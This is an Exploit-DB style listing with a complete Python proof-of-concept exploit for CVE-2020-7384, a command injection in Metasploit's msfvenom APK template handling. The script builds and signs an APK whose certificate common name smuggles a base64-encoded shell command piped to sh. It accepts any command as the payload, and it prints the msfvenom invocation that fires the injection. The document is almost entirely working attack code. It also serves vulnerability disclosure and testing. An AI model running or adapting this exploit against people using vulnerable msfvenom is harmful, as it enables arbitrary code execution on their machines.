Metasploit Framework 6.0.11 – msfvenom APK template command injection

  • 作者: Justin Steven
    日期: 2021-01-28
  • 类别:
    平台:
  • 来源: https://www.exploit-db.com/exploits/49491/
  • # Exploit Title: Metasploit Framework 6.0.11 - msfvenom APK template command injection
    # Exploit Author: Justin Steven
    # Vendor Homepage: https://www.metasploit.com/
    # Software Link: https://www.metasploit.com/
    # Version: Metasploit Framework 6.0.11 and Metasploit Pro 4.18.0
    # CVE : CVE-2020-7384
    
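    #!/usr/bin/env python3
    """Build a signed APK whose certificate DN carries a shell injection (CVE-2020-7384).

    PoC for the msfvenom APK template command injection: when msfvenom is given
    this file as a template (``msfvenom -x evil.apk ...``) it reads the signer
    certificate out of the APK, and per the advisory the certificate's DN ends up
    in a shell command without proper quoting, so the CN built here runs an
    attacker-chosen command as the user running msfvenom.  The exact interpolation
    inside msfvenom is not visible from this script; the injection string is the
    one used by the original PoC.

    Usage:  exploit.py [PAYLOAD]
    PAYLOAD is the shell command to run on the msfvenom host (default below).
    Requires ``zip``, ``keytool`` and ``jarsigner`` on PATH.
    """
    import os
    import shutil
    import subprocess
    import sys
    import tempfile
    from base64 import b64encode

    # Command executed on the msfvenom host; override with the first CLI argument.
    DEFAULT_PAYLOAD = 'echo "Code execution as $(id)" > /tmp/win'

    # Throwaway keystore credentials; the key only has to exist long enough to sign.
    STOREPASS = KEYPASS = "password"
    KEY_ALIAS = "signing.key"
    REQUIRED_TOOLS = ("zip", "keytool", "jarsigner")


    def build_dname(payload):
        """Return the X.500 DN (``CN=...``) that carries the injection for *payload*.

        The payload is base64-encoded so the DN contains none of the characters
        keytool rejects (quotes, commas, ...).  The CN closes a single-quoted shell
        word with ``'``, pipes the decoded payload into ``sh`` and comments out the
        remainder of the host's command line with ``#``.
        """
        encoded = b64encode(payload.encode()).decode()
        return f"CN='|echo {encoded} | base64 -d | sh #"


    def check_tools():
        """Exit with a clear message if any required external binary is missing from PATH."""
        missing = [tool for tool in REQUIRED_TOOLS if shutil.which(tool) is None]
        if missing:
            sys.exit(f"[-] Missing required tool(s) on PATH: {', '.join(missing)}")


    def build_evil_apk(dname, tmpdir):
        """Create and sign a minimal APK in *tmpdir* with a key whose subject DN is *dname*.

        Returns the path of the signed APK.  Raises subprocess.CalledProcessError
        if zip, keytool or jarsigner exits non-zero.
        """
        apk_file = os.path.join(tmpdir, "evil.apk")
        empty_file = os.path.join(tmpdir, "empty")
        keystore_file = os.path.join(tmpdir, "signing.keystore")

        # The template only has to be a zip that jarsigner will sign; one empty entry suffices.
        with open(empty_file, "w"):
            pass
        subprocess.check_call(["zip", "-j", apk_file, empty_file])

        # Generate the signing key with the malicious -dname.  Passing an argv list
        # (no shell) keeps the quote/pipe characters in dname intact for keytool.
        subprocess.check_call([
            "keytool", "-genkey", "-keystore", keystore_file, "-alias", KEY_ALIAS,
            "-storepass", STOREPASS, "-keypass", KEYPASS, "-keyalg", "RSA",
            "-keysize", "2048", "-dname", dname,
        ])

        # Sign so the certificate (and thus the CN) is embedded in the APK's META-INF.
        # SHA-1 is kept from the original PoC; NOTE(review): recent JDKs restrict
        # SHA-1 jar signing, so jarsigner may warn or refuse there - confirm.
        subprocess.check_call([
            "jarsigner", "-sigalg", "SHA1withRSA", "-digestalg", "SHA1",
            "-keystore", keystore_file, "-storepass", STOREPASS, "-keypass", KEYPASS,
            apk_file, KEY_ALIAS,
        ])
        return apk_file


    def main(argv=None):
        """Entry point: build the malicious APK and print the msfvenom command that triggers it.

        *argv* defaults to sys.argv[1:]; an optional first element overrides DEFAULT_PAYLOAD.
        """
        args = sys.argv[1:] if argv is None else argv
        payload = args[0] if args else DEFAULT_PAYLOAD
        dname = build_dname(payload)

        print("[+] Manufacturing evil apkfile")
        print(f"Payload: {payload}")
        print(f"-dname: {dname}")
        print()

        check_tools()
        # The directory is deliberately not cleaned up: the APK must outlive this script
        # so it can be handed to msfvenom.  mkdtemp creates it mode 0700.
        tmpdir = tempfile.mkdtemp()
        apk_file = build_evil_apk(dname, tmpdir)

        print()
        print(f"[+] Done! apkfile is at {apk_file}")
        print(f"Do: msfvenom -x {apk_file} -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -o /dev/null")


    if __name__ == "__main__":
        main()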